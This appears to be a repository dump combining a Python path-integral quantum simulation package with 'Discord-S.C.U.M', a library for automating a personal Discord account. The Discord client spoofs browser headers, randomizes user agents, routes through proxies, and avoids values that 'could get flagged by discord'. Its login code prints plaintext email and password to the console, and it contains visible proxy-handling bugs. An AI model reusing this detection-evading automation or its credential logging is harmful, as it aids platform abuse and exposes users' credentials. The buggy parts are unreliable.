grid_ranges: Where the grids are truncated. Each grid is symmetric
about the origin.
grid_lens: How many points are on the grids.
beta: Propagation length of the entire path.
num_links: Number of links in the entire path.
pot_f: Potential experienced by the particles in some spatial
configuration.
"""
assert len(masses) == len(grid_ranges) == len(grid_lens), \
'Numbers of configuration items must match.'
assert all(m > 0 for m in masses), 'Masses must be positive.'
assert all(gr > 0 for gr in grid_ranges), 'Grids must have positive lengths.'
assert all(gl >= 2 for gl in grid_lens), 'Grids must have at least two points.'
assert beta > 0, 'Beta must be positive.'
assert num_links >= 2, 'Must have at least two links.'
self._masses = np.array(masses)
self._grid_ranges = np.array(grid_ranges)
self._grid_lens = np.array(grid_lens)
self._pot_f = pot_f
self._beta = beta
self._num_links = num_links
# For cached decorator.
self._cached = {}
@property
def masses(self) -> '[g/mol]':
return self._masses
@property
def grid_ranges(self) -> '[nm]':
return self._grid_ranges
@property
def grid_lens(self) -> '[1]':
return self._grid_lens
@property
def pot_f(self) -> '[nm] -> kJ/mol':
return self._pot_f
@property
def beta(self) -> 'mol/kJ':
return self._beta
@property
def num_links(self) -> '1':
return self._num_links
@property
@cached
def tau(self) -> 'mol/kJ':
"""
High-temperature propagator length.
"""
return self.beta / self.num_links
@property
@cached
def num_points(self) -> '1':
"""
Number of points in the coordinate vector.
"""
return np.prod(self.grid_lens)
@property
@cached
def grid(self) -> '[[nm]]':
"""
Vector of the positions corresponding to the grid points.
This is not a vector in the sense of a 1-dimensional array, because
each element is itself a vector of coordinates for each particle.
However, it can be thought of as the tensor product of the
1-dimensional position vectors.
"""
grids = [np.linspace(-gr, gr, gl) for (gr, gl) in zip(self.grid_ranges, self.grid_lens)]
result = np.array(list(product(*grids)))
assert result.shape == (self.num_points, len(self.masses))
return result
@property
@cached
def volume_element(self) -> 'nm^N':
"""
Effective volume taken up by each grid point.
"""
return np.prod(2 * self.grid_ranges / (self.grid_lens - 1))
@property
@cached
def pot_f_grid(self) -> '[kJ/mol]':
"""
Potential function evaluated on the grid.
"""
return self.pot_f(self.grid)
@property
@cached
def rho_tau(self) -> '[[1/nm^N]]':
"""
Matrix for the high-temperature propagator.
"""
prefactors_K = self.masses / (2 * HBAR * HBAR * self.tau) # [1/nm^2]
prefactor_V = self.tau / 2 # mol/kJ
prefactor_front = np.sqrt(np.prod(prefactors_K) / np.pi) # 1/nm^N
K = np.empty((self.num_points, self.num_points)) # [[nm^2]]
V = np.empty_like(K) # [[kJ/mol]]
for i, q_i in enumerate(self.grid):
for j, q_j in enumerate(self.grid):
K[i, j] = np.sum(prefactors_K * (q_i - q_j) ** 2)
V[i, j] = self.pot_f_grid[i] + self.pot_f_grid[j]
return prefactor_front * np.exp(-K - prefactor_V * V)
@property
def density_diagonal(self):
raise NotImplementedError()
def expectation_value(self, property_f: '[nm] -> X') -> 'X':
"""
Expectation value of property_f.
Note:
This is only implemented for properties that are diagonal in the
position representation.
Note:
When property_f receives an N-dimensional array as input, it should
behave in the same manner as pot_f.
"""
return np.dot(self.density_diagonal, property_f(self.grid))
class PIFTMM(PIMM):
"""
Path Integral at Finite Temperature via Matrix Multiplication
Calculate the approximate thermal density matrix of a system comprised of
one or more particles in an arbitrary potential on a discretized and
truncated grid. The density matrix is determined via numerical matrix
multiplication of high-temperature matrices.
"""
@property
@cached
def rho_beta(self) -> '[[1/nm^N]]':
"""
Matrix for the full path propagator.
"""
power = self.num_links - 1
eigvals, eigvecs = np.linalg.eigh(self.volume_element * self.rho_tau)
result = np.dot(np.dot(eigvecs, np.diag(eigvals ** power)), eigvecs.T)
return result / self.volume_element
@property
@cached
def density(self) -> '[[1]]':
"""
Normalized thermal density matrix.
"""
density = self.rho_beta
# Explicitly normalize.
density /= density.diagonal().sum()
return density
@property
@cached
def density_diagonal(self) -> '[1]':
"""
Normalized thermal diagonal density.
"""
return self.density.diagonal()
class PIGSMM(PIMM):
"""
Path Integral Ground State via Matrix Multiplication
Calculate the approximate ground state wavefunction of a system comprised
of one or more particles in an arbitrary potential on a discretized and
truncated grid. The wavefunction is determined via imaginary time
propagation from a trial function using numerical matrix multiplication.
"""
def __init__(self, masses: '[g/mol]', grid_ranges: '[nm]',
grid_lens: '[1]', pot_f: '[nm] -> kJ/mol',
beta: 'mol/kJ', num_links: '1', *,
trial_f: '[nm] -> 1' = None,
trial_f_diffs: '[[nm] -> 1/nm^2]' = None):
"""
See PIMM.__init__ for more details.
Note:
The convention used is that beta represents the entire path, so the
propagation length from the trial function to the middle of the path
is beta/2.
Note:
When trial_f receives an N-dimensional array as input, it should
behave in the same manner as pot_f.
Parameters:
trial_f: Approximation to the ground state wavefunction. If none is
provided, a uniform trial function is used.
trial_f_diffs: Second derivatives of trial_f. One function must be
specified for each particle.
"""
super().__init__(masses, grid_ranges, grid_lens, pot_f, beta, num_links)
assert num_links % 2 == 0, 'Number of links must be even.'
if trial_f is not None:
assert trial_f_diffs is not None, 'Derivatives must be provided.'
assert len(trial_f_diffs) == len(masses), 'Number of derivatives must match.'
self._trial_f = trial_f
self._trial_f_diffs = trial_f_diffs
@property
def trial_f(self) -> '[nm] -> 1':
return self._trial_f
@property
def trial_f_diffs(self) -> '[[nm] -> 1/nm^2]':
return self._trial_f_diffs
@property
@cached
def uniform_trial_f_grid(self) -> '[1]':
"""
Unnormalized uniform trial function evaluated on the grid.
"""
return np.ones(self.num_points)
@property
@cached
def trial_f_grid(self) -> '[1]':
"""
Unnormalized trial function evaluated on the grid.
"""
if self.trial_f is None:
# Default to a uniform trial function.
return self.uniform_trial_f_grid
return self.trial_f(self.grid)
@property
@cached
def uniform_trial_f_diffs_grid(self) -> '[[1/nm^2]]':
"""
Unnormalized uniform trial function derivatives evaluated on the grid.
"""
return np.zeros(self.grid.T.shape)
@property
@cached
def trial_f_diffs_grid(self) -> '[[1/nm^2]]':
"""
Unnormalized trial function derivatives evaluated on the grid.
"""
if self.trial_f is None:
# Default to a uniform trial function.
return self.uniform_trial_f_diffs_grid
result = np.empty(self.grid.T.shape)
for i, f in enumerate(self.trial_f_diffs):
result[i] = f(self.grid)
return result
@property
@cached
def rho_beta_half(self) -> '[[1/nm^N]]':
"""
Matrix for the half path propagator.
"""
power = self.num_links // 2
eigvals, eigvecs = np.linalg.eigh(self.volume_element * self.rho_tau)
result = np.dot(np.dot(eigvecs, np.diag(eigvals ** power)), eigvecs.T)
return result / self.volume_element
@property
@cached
def rho_beta(self) -> '[[1/nm^N]]':
"""
Matrix for the full path propagator.
"""
return self.volume_element * np.dot(self.rho_beta_half, self.rho_beta_half)
@property
@cached
def ground_wf(self) -> '[1]':
"""
Normalized ground state wavefunction.
"""
ground_wf = np.dot(self.rho_beta_half, self.trial_f_grid)
# Explicitly normalize.
ground_wf /= np.sqrt(np.sum(ground_wf ** 2))
return ground_wf
@property
@cached
def density(self) -> '[[1]]':
"""
Normalized ground state density matrix.
"""
return np.outer(self.ground_wf, self.ground_wf)
@property
@cached
def density_diagonal(self) -> '[1]':
"""
Normalized ground state diagonal density.
"""
return self.ground_wf ** 2
@property
@cached
def energy_mixed(self) -> 'kJ/mol':
"""
Ground state energy calculated using the mixed estimator.
"""
ground_wf_full = np.dot(self.rho_beta, self.trial_f_grid) # [1/nm^N]
trial_f_diffs = np.sum(self.trial_f_diffs_grid / self.masses[:, np.newaxis], axis=0) # [mol/g nm^2]
energy_V = np.sum(ground_wf_full * self.pot_f_grid * self.trial_f_grid) # kJ/mol nm^N
energy_K = np.dot(ground_wf_full, trial_f_diffs) # mol/g nm^(N+2)
normalization = np.dot(ground_wf_full, self.trial_f_grid) # 1/nm^N
return (energy_V - 0.5 * HBAR * HBAR * energy_K) / normalization
@property
@cached
def density_reduced(self) -> '[[1]]':
"""
Density matrix for the first particle, with the other traced out.
Only implemented for two-particle systems.
"""
assert len(self.masses) == 2
new_len = self.grid_lens[0]
other_len = self.grid_lens[1]
density_new = np.zeros((new_len, new_len))
for i in range(new_len):
for j in range(new_len):
for t in range(other_len):
# Avoid computing self.density here.
density_new[i, j] += self.ground_wf[other_len * i + t] * self.ground_wf[other_len * j + t]
return density_new
@property
@cached
def trace_renyi2(self) -> '1':
"""
Trace of the square of the reduced density matrix.
The 2nd Rényi entropy is the negative logarithm of this quantity.
"""
return np.linalg.matrix_power(self.density_reduced, 2).trace()
class PIGSIMM(PIGSMM):
"""
Path Integral Ground State via Implicit Matrix Multiplication
Calculate the approximate ground state wavefunction of a system comprised
of one or more particles in an arbitrary potential on a discretized and
truncated grid. The wavefunction is determined via imaginary time
propagation from a trial function using implicit numerical matrix-vector
multiplication, where the full density matrix is never constructed.
"""
@property
def rho_tau(self):
# We don't build any (full) matrices!
raise NotImplementedError()
@property
def rho_beta_half(self):
raise NotImplementedError()
@property
def rho_beta(self):
raise NotImplementedError()
def _propagate_trial(self, start_grid: '[1]', power: '1') -> '[1]':
"""
Multiply start_grid by (rho_tau ** power).
"""
prefactors_K = self.masses / (2 * HBAR * HBAR * self.tau) # [1/nm^2]
pot_exp = np.exp(-0.5 * self.tau * self.pot_f_grid) # [1]
temp_wf1 = start_grid.copy() # [1]
temp_wf2 = np.zeros_like(temp_wf1) # [1]
for _ in range(power):
temp_wf1 *= pot_exp
for q, wf in zip(self.grid, temp_wf1):
# The temporary array here is the same shape as self.grid.
temp_wf2 += np.exp(-np.sum(prefactors_K * (self.grid - q) ** 2, axis=1)) * wf
temp_wf2 *= pot_exp
# Explicitly normalize at each step for stability.
temp_wf1 = temp_wf2 / np.sqrt(np.sum(temp_wf2 ** 2))
temp_wf2 = np.zeros_like(temp_wf1)
return temp_wf1
@property
@cached
def ground_wf(self) -> '[1]':
"""
Normalized ground state wavefunction.
"""
return self._propagate_trial(self.trial_f_grid, self.num_links // 2)
@property
def density(self):
raise NotImplementedError()
@property
@cached
def energy_mixed(self) -> 'kJ/mol':
"""
Ground state energy calculated using the mixed estimator.
"""
ground_wf_full = self._propagate_trial(self.ground_wf, self.num_links // 2) # [1]
trial_f_diffs = np.sum(self.trial_f_diffs_grid / self.masses[:, np.newaxis], axis=0) # [mol/g nm^2]
energy_V = np.sum(ground_wf_full * self.pot_f_grid * self.trial_f_grid) # kJ/mol
energy_K = np.dot(ground_wf_full, trial_f_diffs) # mol/g nm^2
normalization = np.dot(ground_wf_full, self.trial_f_grid) # 1
return (energy_V - 0.5 * HBAR * HBAR * energy_K) / normalization
--- FILE SEPARATOR ---
"""
Convenience functions for plotting the generated data.
"""
import matplotlib.pyplot as plt
def plot2d(data: '[[X]]', x_range, y_range, out_path, *, x_label=None, y_label=None, colormap='jet', colorbar=True):
"""
Plot the data as a heat map.
The resulting image is saved to out_path.
Parameters:
data: Two-dimensional array of numbers to plot.
x_range: Tuple containing the min and max values for the x axis.
y_range: Tuple containing the min and max values for the y axis.
out_path: The path to the file where the image should be written. The
extension determines the image format (e.g. pdf, png).
x_label: Label for the x axis.
y_label: Label for the y axis.
colormap: matplotlib colormap to use for the image.
colorbar: Whether to display the colorbar.
"""
fig = plt.figure()
ax = fig.gca()
img = ax.imshow(data, cmap=colormap, origin='lower', extent=(x_range + y_range))
if x_label is not None:
ax.set_xlabel(x_label)
if y_label is not None:
ax.set_ylabel(y_label)
if colorbar:
fig.colorbar(img, drawedges=False)
fig.savefig(out_path, bbox_inches='tight', transparent=True)
--- FILE SEPARATOR ---
"""
Example potential functions.
"""
import numpy as np
def free_particle_potential() -> 'nm -> kJ/mol':
"""
Free particle potential.
"""
def free_particle(q: 'nm') -> 'kJ/mol':
# Remove the inner-most dimension.
return np.zeros(q.shape[:-1])
return free_particle
def harmonic_potential(k: 'kJ/mol nm^2' = None, m: 'g/mol' = None, w: '1/ps' = None) -> 'nm -> kJ/mol':
"""
Harmonic potential relative to the origin.
Note:
Either k or (m and w) must be specified.
Parameters:
k: Spring constant.
m: Mass of particle.
w: Angular frequency of oscillator.
"""
if k is not None:
force_constant = k # kJ/mol nm^2
elif m is not None and w is not None:
force_constant = m * w * w # kJ/mol nm^2
else:
assert False, 'Must provide either k or (m and w).'
def harmonic(q: 'nm') -> 'kJ/mol':
return force_constant * q[..., 0] * q[..., 0] / 2
return harmonic
--- FILE SEPARATOR ---
"""
Assorted tools.
"""
from functools import wraps
def cached(f):
"""
A simple cache for constant instance methods.
Requires a _cached dict on the instance.
"""
@wraps(f)
def wrapped(self, *args, **kwargs):
if f not in self._cached:
self._cached[f] = f(self, *args, **kwargs)
return self._cached[f]
return wrapped
|
[
"/examples/pift_harmonic_oscillator.py",
"/examples/pigs_harmonic_oscillator.py",
"/examples/pigs_harmonic_oscillator_entangled.py",
"/pathintmatmult/__init__.py",
"/pathintmatmult/nmm.py",
"/pathintmatmult/plotting.py",
"/pathintmatmult/potentials.py",
"/pathintmatmult/tools.py"
] |
00-00-00-11/Discord-S.C.U.M
|
import inspect
class LogLevel:
INFO = '\033[94m'
OK = '\033[92m'
WARNING = '\033[93m'
DEFAULT = '\033[m'
class Logger:
@staticmethod
def LogMessage(msg, hex_data='', to_file=False, to_console=True, log_level=LogLevel.INFO): #to_file was acting a bit buggy so I decided to remove it altogether for now
stack = inspect.stack()
function_name = "({}->{})".format(str(stack[1][0].f_locals['self']).split(' ')[0], stack[1][3])
if to_console is True:
if hex_data != '':
print('{} {}'.format(log_level, " ".join([h.encode('hex') for h in hex_data])))
else:
print('{} [+] {} {}'.format(log_level, function_name, msg))
print(LogLevel.DEFAULT) # restore console color
--- FILE SEPARATOR ---
from .discum import *
from .gateway.gateway import *
from .Logger import *
from .login.Login import *
--- FILE SEPARATOR ---
from .guild.guild import Guild
from .messages.messages import Messages
from .messages.embed import Embedder
from .user.user import User
from .login.Login import *
from .gateway.gateway import *
import time
import random
import re
import user_agents
class SessionSettingsError(Exception):
pass
class Client:
def __init__(self, email="none", password="none", token="none", proxy_host=None, proxy_port=None, user_agent="random", log=True): #not using None on email, pass, and token since that could get flagged by discord...
self.log = log
self.__user_token = token
self.__user_email = email
self.__user_password = password
self.__proxy_host = None if proxy_host in (None,False) else proxy_host
self.__proxy_port = None if proxy_host in (None,False) else proxy_host
self.session_settings = [] #consists of 2 parts, READY and READY_SUPPLEMENTAL
self.discord = 'https://discord.com/api/v8/'
self.websocketurl = 'wss://gateway.discord.gg/?encoding=json&v=8'
if user_agent != "random":
self.__user_agent = user_agent
else:
from random_user_agent.user_agent import UserAgent #only really want to import this if needed...which is why it's down here
self.__user_agent = UserAgent(limit=100).get_random_user_agent()
if self.log: print('Randomly generated user agent: '+self.__user_agent)
parseduseragent = user_agents.parse(self.__user_agent)
self.ua_data = {'os':parseduseragent.os.family,'browser':parseduseragent.browser.family,'device':parseduseragent.device.family if parseduseragent.is_mobile else '','browser_user_agent':self.__user_agent,'browser_version':parseduseragent.browser.version_string,'os_version':parseduseragent.os.version_string}
if self.__user_token in ("none",None,False): #assuming email and pass are given...
self.__login = Login(self.discord,self.__user_email,self.__user_password,self.__user_agent,self.__proxy_host,self.__proxy_port,self.log)
self.__user_token = self.__login.GetToken() #update token from "none" to true string value
time.sleep(1)
self.headers = {
"Host": "discord.com",
"User-Agent": self.__user_agent,
"Accept": "*/*",
"Accept-Language": "en-US",
"Authorization": self.__user_token,
"Connection": "keep-alive",
"keep-alive" : "timeout=10, max=1000",
"TE": "Trailers",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Referer": "https://discord.com/channels/@me",
"Content-Type": "application/json"
}
self.s = requests.Session()
self.s.headers.update(self.headers)
if self.__proxy_host != None: #self.s.proxies defaults to {}
self.proxies = {
'http': self.__proxy_host+':'+self.__proxy_port,
'https': self.__proxy_host+':'+self.__proxy_port
}
self.s.proxies.update(proxies)
if self.log: print("Retrieving Discord's build number...")
discord_login_page_exploration = self.s.get('https://discord.com/login').text
time.sleep(1)
try: #getting the build num is kinda experimental since who knows if discord will change where the build number is located...
file_with_build_num = 'https://discord.com/assets/'+re.compile(r'assets/+([a-z0-9]+)\.js').findall(discord_login_page_exploration)[-2]+'.js' #fastest solution I could find since the last js file is huge in comparison to 2nd from last
req_file_build = self.s.get(file_with_build_num).text
index_of_build_num = req_file_build.find('buildNumber')+14
self.discord_build_num = int(req_file_build[index_of_build_num:index_of_build_num+5])
self.ua_data['build_num'] = self.discord_build_num #putting this onto ua_data since getting the build num won't necessarily work
if self.log: print('Discord is currently on build number '+str(self.discord_build_num))
except:
if self.log: print('Could not retrieve discord build number.')
self.gateway = GatewayServer(self.websocketurl, self.__user_token, self.ua_data, self.__proxy_host, self.__proxy_port, self.log)
'''
test connection (this function was originally in discum and was created by Merubokkusu)
'''
def connectionTest(self): #,proxy):
url=self.discord+'users/@me/affinities/users'
connection = self.s.get(url)
if(connection.status_code == 200):
if self.log: print("Connected")
else:
if self.log: print("Incorrect Token")
return connection
'''
discord snowflake to unix timestamp and back
'''
def snowflake_to_unixts(self,snowflake):
return int((snowflake/4194304+1420070400000)/1000)
def unixts_to_snowflake(self,unixts):
return int((unixts*1000-1420070400000)*4194304)
'''
Messages
'''
#create DM
def createDM(self,recipients):
return Messages(self.discord,self.s,self.log).createDM(recipients)
#get recent messages
def getMessages(self,channelID,num=1,beforeDate=None,aroundMessage=None): # num <= 100, beforeDate is a snowflake
return Messages(self.discord,self.s,self.log).getMessages(channelID,num,beforeDate,aroundMessage)
#send text or embed messages
def sendMessage(self,channelID,message,embed="",tts=False):
return Messages(self.discord,self.s,self.log).sendMessage(channelID,message,embed,tts)
#send files (local or link)
def sendFile(self,channelID,filelocation,isurl=False,message=""):
return Messages(self.discord,self.s,self.log).sendFile(channelID,filelocation,isurl,message)
#search messages
def searchMessages(self,guildID,channelID=None,userID=None,mentionsUserID=None,has=None,beforeDate=None,afterDate=None,textSearch=None,afterNumResults=None):
return Messages(self.discord,self.s,self.log).searchMessages(guildID,channelID,userID,mentionsUserID,has,beforeDate,afterDate,textSearch,afterNumResults)
#filter searchMessages, takes in the output of searchMessages (a requests response object) and outputs a list of target messages
def filterSearchResults(self,searchResponse):
return Messages(self.discord,self.s,self.log).filterSearchResults(searchResponse)
#sends the typing action for 10 seconds (or technically until you change the page)
def typingAction(self,channelID):
return Messages(self.discord,self.s,self.log).typingAction(channelID)
#delete message
def deleteMessage(self,channelID,messageID):
return Messages(self.discord,self.s,self.log).deleteMessage(channelID,messageID)
#edit message
def editMessage(self,channelID,messageID,newMessage):
return Messages(self.discord,self.s,self.log).editMessage(channelID, messageID, newMessage)
#pin message
def pinMessage(self,channelID,messageID):
return Messages(self.discord,self.s,self.log).pinMessage(channelID,messageID)
#un-pin message
def unPinMessage(self,channelID,messageID):
return Messages(self.discord,self.s,self.log).unPinMessage(channelID,messageID)
#get pinned messages
def getPins(self,channelID):
return Messages(self.discord,self.s,self.log).getPins(channelID)
#add reaction
def addReaction(self,channelID,messageID,emoji):
return Messages(self.discord,self.s,self.log).addReaction(channelID,messageID,emoji)
#remove reaction
def removeReaction(self,channelID,messageID,emoji):
return Messages(self.discord,self.s,self.log).removeReaction(channelID,messageID,emoji)
#acknowledge message (mark message read)
def ackMessage(self,channelID,messageID,ackToken=None):
return Messages(self.discord,self.s,self.log).ackMessage(channelID,messageID,ackToken)
#unacknowledge message (mark message unread)
def unAckMessage(self,channelID,messageID,numMentions=0):
return Messages(self.discord,self.s,self.log).unAckMessage(channelID,messageID,numMentions)
'''
User relationships
'''
#create outgoing friend request
def requestFriend(self,user): #you can input a userID(snowflake) or a user discriminator
return User(self.discord,self.s,self.log).requestFriend(user)
#accept incoming friend request
def acceptFriend(self,userID):
return User(self.discord,self.s,self.log).acceptFriend(userID)
#remove friend OR unblock user
def removeRelationship(self,userID):
return User(self.discord,self.s,self.log).removeRelationship(userID)
#block user
def blockUser(self,userID):
return User(self.discord,self.s,self.log).blockUser(userID)
'''
Profile edits
'''
# change name
def changeName(self,name):
return User(self.discord,self.s,self.log).changeName(self.email,self.password,name)
# set status
def setStatus(self,status):
return User(self.discord,self.s,self.log).setStatus(status)
# set avatar
def setAvatar(self,imagePath):
return User(self.discord,self.s,self.log).setAvatar(self.email,self.password,imagePath)
'''
Guild/Server stuff
'''
#get guild info from invite code
def getInfoFromInviteCode(self,inviteCode):
return Guild(self.discord,self.s,self.log).getInfoFromInviteCode(inviteCode)
#join guild with invite code
def joinGuild(self,inviteCode):
return Guild(self.discord,self.s,self.log).joinGuild(inviteCode)
#kick a user
def kick(self,guildID,userID,reason=""):
return Guild(self.discord,self.s,self.log).kick(guildID,userID,reason)
#ban a user
def ban(self,guildID,userID,deleteMessagesDays=0,reason=""):
return Guild(self.discord,self.s,self.log).ban(guildID,userID,deleteMessagesDays,reason)
#look up a user in a guild
def getGuildMember(self,guildID,userID):
return Guild(self.discord,self.s,self.log).getGuildMember(guildID,userID)
--- FILE SEPARATOR ---
from .gateway import *
from .sessionsettings import *
--- FILE SEPARATOR ---
import websocket
import json
import time
import random
import base64
if __import__('sys').version.split(' ')[0] < '3.0.0':
import thread
else:
import _thread as thread
from .sessionsettings import SessionSettings
class GatewayServer:
class LogLevel:
SEND = '\033[94m'
RECEIVE = '\033[92m'
WARNING = '\033[93m'
DEFAULT = '\033[m'
class OPCODE: #https://discordapp.com/developers/docs/topics/opcodes-and-status-codes
# Name Code Client Action Description
DISPATCH = 0 # Receive dispatches an event
HEARTBEAT = 1 # Send/Receive used for ping checking
IDENTIFY = 2 # Send used for client handshake
STATUS_UPDATE = 3 # Send used to update the client status
VOICE_UPDATE = 4 # Send used to join/move/leave voice channels
# 5 # ??? ???
RESUME = 6 # Send used to resume a closed connection
RECONNECT = 7 # Receive used to tell clients to reconnect to the gateway
REQUEST_GUILD_MEMBERS = 8 # Send used to request guild members
INVALID_SESSION = 9 # Receive used to notify client they have an invalid session id
HELLO = 10 # Receive sent immediately after connecting, contains heartbeat and server debug information
HEARTBEAT_ACK = 11 # Sent immediately following a client heartbeat that was received
GUILD_SYNC = 12 #
def __init__(self, websocketurl, token, ua_data, proxy_host=None, proxy_port=None, log=True):
self.token = token
self.ua_data = ua_data
self.auth = {
"token": self.token,
"capabilities": 61,
"properties": {
"os": self.ua_data["os"],
"browser": self.ua_data["browser"],
"device": self.ua_data["device"],
"browser_user_agent": self.ua_data["browser_user_agent"],
"browser_version": self.ua_data["browser_version"],
"os_version": self.ua_data["os_version"],
"referrer": "",
"referring_domain": "",
"referrer_current": "",
"referring_domain_current": "",
"release_channel": "stable",
"client_build_number": 71420,
"client_event_source": None
},
"presence": {
"status": "online",
"since": 0,
"activities": [],
"afk": False
},
"compress": False,
"client_state": {
"guild_hashes": {},
"highest_last_message_id": "0",
"read_state_version": 0,
"user_guild_settings_version": -1
}
}
if 'build_num' in self.ua_data and self.ua_data['build_num']!=71420:
self.auth['properties']['client_build_number'] = self.ua_data['build_num']
self.proxy_host = None if proxy_host in (None,False) else proxy_host
self.proxy_port = None if proxy_port in (None,False) else proxy_port
self.log = log
self.interval = None
self.session_id = None
self.sequence = 0
self.READY = False #becomes True once READY_SUPPLEMENTAL is received
self.settings_ready = {}
self.settings_ready_supp = {}
#websocket.enableTrace(True)
self.ws = self._get_ws_app(websocketurl)
self._after_message_hooks = []
self._last_err = None
self.connected = False
self.resumable = False
self.voice_data = {} #voice connections dependent on current (connected) session
#WebSocketApp, more info here: https://github.com/websocket-client/websocket-client/blob/master/websocket/_app.py#L79
def _get_ws_app(self, websocketurl):
sec_websocket_key = base64.b64encode(bytes(random.getrandbits(8) for _ in range(16))).decode() #https://websockets.readthedocs.io/en/stable/_modules/websockets/handshake.html
headers = {
"Host": "gateway.discord.gg",
"Connection": "Upgrade",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"User-Agent": self.ua_data["browser_user_agent"],
"Upgrade": "websocket",
"Origin": "https://discord.com",
"Sec-WebSocket-Version": "13",
"Accept-Language": "en-US",
"Sec-WebSocket-Key": sec_websocket_key
} #more info: https://stackoverflow.com/a/40675547
ws = websocket.WebSocketApp(websocketurl,
header = headers,
on_open=lambda ws: self.on_open(ws),
on_message=lambda ws, msg: self.on_message(ws, msg),
on_error=lambda ws, msg: self.on_error(ws, msg),
on_close=lambda ws: self.on_close(ws)
)
return ws
def on_open(self, ws):
self.connected = True
if self.log: print("Connected to websocket.")
if not self.resumable:
self.send({"op": self.OPCODE.IDENTIFY, "d": self.auth})
else:
self.resumable = False
self.send({"op": self.OPCODE.RESUME, "d": {"token": self.token, "session_id": self.session_id, "seq": self.sequence-1 if self.sequence>0 else self.sequence}})
def on_message(self, ws, message):
self.sequence += 1
resp = json.loads(message)
if self.log: print('%s< %s%s' % (self.LogLevel.RECEIVE, resp, self.LogLevel.DEFAULT))
if resp['op'] == self.OPCODE.HELLO: #only happens once, first message sent to client
self.interval = (resp["d"]["heartbeat_interval"]-2000)/1000
thread.start_new_thread(self._heartbeat, ())
elif resp['op'] == self.OPCODE.INVALID_SESSION:
if self.log: print("Invalid session.")
if self.resumable:
self.resumable = False
self.sequence = 0
self.close()
else:
self.sequence = 0
self.close()
if self.interval == None:
if self.log: print("Identify failed.")
self.close()
if resp['t'] == "READY":
self.session_id = resp['d']['session_id']
self.settings_ready = resp['d']
elif resp['t'] == "READY_SUPPLEMENTAL":
self.resumable = True #completely successful identify
self.settings_ready_supp = resp['d']
self.SessionSettings = SessionSettings(self.settings_ready, self.settings_ready_supp)
self.READY = True
elif resp['t'] in ("VOICE_SERVER_UPDATE", "VOICE_STATE_UPDATE"):
self.voice_data.update(resp['d']) #called twice, resulting in a dictionary with 12 keys
thread.start_new_thread(self._response_loop, (resp,))
def on_error(self, ws, error):
if self.log: print('%s%s%s' % (self.LogLevel.WARNING, error, self.LogLevel.DEFAULT))
self._last_err = error
def on_close(self, ws):
self.connected = False
self.READY = False #reset self.READY
if self.log: print('websocket closed')
#Discord needs heartbeats, or else connection will sever
def _heartbeat(self):
if self.log: print("entering heartbeat")
while self.connected:
time.sleep(self.interval)
if not self.connected:
break
self.send({"op": self.OPCODE.HEARTBEAT,"d": self.sequence-1 if self.sequence>0 else self.sequence})
#just a wrapper for ws.send
def send(self, payload):
if self.log: print('%s> %s%s' % (self.LogLevel.SEND, payload, self.LogLevel.DEFAULT))
self.ws.send(json.dumps(payload))
def close(self):
self.connected = False
self.READY = False #reset self.READY
if self.log: print('websocket closed') #sometimes this message will print twice. Don't worry, that's not an error.
self.ws.close()
#the next 2 functions come from https://github.com/scrubjay55/Reddit_ChatBot_Python/blob/master/Reddit_ChatBot_Python/Utils/WebSockClient.py (Apache License 2.0)
def command(self, func):
self._after_message_hooks.append(func)
return func
def _response_loop(self, resp):
for func in self._after_message_hooks:
if func(resp):
break
def removeCommand(self, func):
try:
self._after_message_hooks.remove(func)
except ValueError:
if self.log: print('%s not found in _after_message_hooks.' % func)
pass
def clearCommands(self):
self._after_message_hooks = []
def resetSession(self): #just resets some variables that in-turn, resets the session (client side). Do not run this while running run().
self.interval = None
self.session_id = None
self.sequence = 0
self.READY = False #becomes True once READY_SUPPLEMENTAL is received
self.settings_ready = {}
self.settings_ready_supp = {}
self._last_err = None
self.voice_data = {}
self.resumable = False #you can't resume anyways without session_id and sequence
#modified version of function run_4ever from https://github.com/scrubjay55/Reddit_ChatBot_Python/blob/master/Reddit_ChatBot_Python/Utils/WebSockClient.py (Apache License 2.0)
def run(self, auto_reconnect=True):
while auto_reconnect:
self.ws.run_forever(ping_interval=10, ping_timeout=5, http_proxy_host=self.proxy_host, http_proxy_port=self.proxy_port)
if isinstance(self._last_err, websocket._exceptions.WebSocketAddressException) or isinstance(self._last_err, websocket._exceptions.WebSocketTimeoutException):
if self.resumable:
waitTime = random.randrange(1,6)
if self.log: print("Connection Dropped. Attempting to resume last valid session in %s seconds." % waitTime)
time.sleep(waitTime)
else:
if self.log: print("Connection Dropped. Retrying in 10 seconds.")
time.sleep(10)
continue
elif not self.resumable: #this happens if you send an IDENTIFY but discord says INVALID_SESSION in response
if self.log: print("Connection Dropped. Retrying in 10 seconds.")
time.sleep(10)
continue
else:
self.resumable = True
return 0
if not auto_reconnect:
self.ws.run_forever(ping_interval=10, ping_timeout=5, http_proxy_host=self.proxy_host, http_proxy_port=self.proxy_port)
--- FILE SEPARATOR ---
from ..Logger import *
import requests
#import requests[socks] #youll need to pip install requests[socks] (this is only if youre using socks)
import json
class Login:
'''
Manages HTTP authentication
'''
def __init__(self, discordurlstart, user_email, user_password,user_agent,proxy_host,proxy_port,log):
self.log = log
self.URL = discordurlstart + "auth/login"
self.__user_email = user_email
self.__user_password = user_password
self.__user_agent = user_agent
self.__proxy_host = proxy_host
self.__proxy_port = proxy_port
self.__token = None
def Connect(self):
session = requests.Session()
if self.__proxy_host not in (None,False):
proxies = {
'http': self.__proxy_host+':'+self.__proxy_port,
'https': self.__proxy_host+':'+self.__proxy_port
}
session.proxies.update(proxies)
session.headers.update({"User-Agent": self.__user_agent})
session.headers.update({'X-Super-Properties': ''})
session.headers.update({"Content-Type": "application/json"})
http_auth_data = '{{"email": "{}", "password": "{}", "undelete": false, "captcha_key": null, "login_source": null, "gift_code_sku_id": null}}'.format(self.__user_email, self.__user_password)
if self.log: Logger.LogMessage('Post -> {}'.format(self.URL))
if self.log: Logger.LogMessage('{}'.format(http_auth_data))
response = session.post(self.URL, data=http_auth_data)
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
self.__token = json.loads(response.content)['token']
def GetToken(self):
if self.__token is None:
self.Connect()
return self.__token
--- FILE SEPARATOR ---
import requests
import json
import base64
from ..Logger import *
class User(object):
def __init__(self, discord, s, log): #s is the requests session object
self.discord = discord
self.s = s
self.log = log
#def getDMs(self): #websockets does this now
# url = self.discord+"users/@me/channels"
# return self.s.get(url)
#def getGuilds(self): #websockets does this now
# url = self.discord+"users/@me/guilds"
# return self.s.get(url)
#def getRelationships(self): #websockets does this now
# url = self.discord+"users/@me/relationships"
